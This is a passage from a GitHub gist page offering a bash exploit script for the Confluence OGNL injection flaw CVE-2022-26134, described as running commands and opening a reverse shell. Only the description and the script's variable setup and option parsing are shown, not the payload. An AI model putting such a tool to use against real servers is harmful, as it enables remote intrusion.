Skip to content

Instantly share code, notes, and snippets.

View enciphers-team's full-sized avatar

Enciphers enciphers-team

View GitHub Profile
@enciphers-team
enciphers-team / CVE-2022-26134.sh
Created May 18, 2023 16:29
A shell script developed to exploit the OGNL injection vulnerability (CVE-2022-26134). It simplifies the exploitation process and provides a convenient method for executing commands and establishing a reverse shell connection. The script supports single-word commands and allows the user to specify an IP address and port for the reverse shell con…
#!/bin/bash
URL=""
COMMAND=""
IP=""
PORT=""
while getopts "u:c:i:p:h" opt; do
case ${opt} in
u )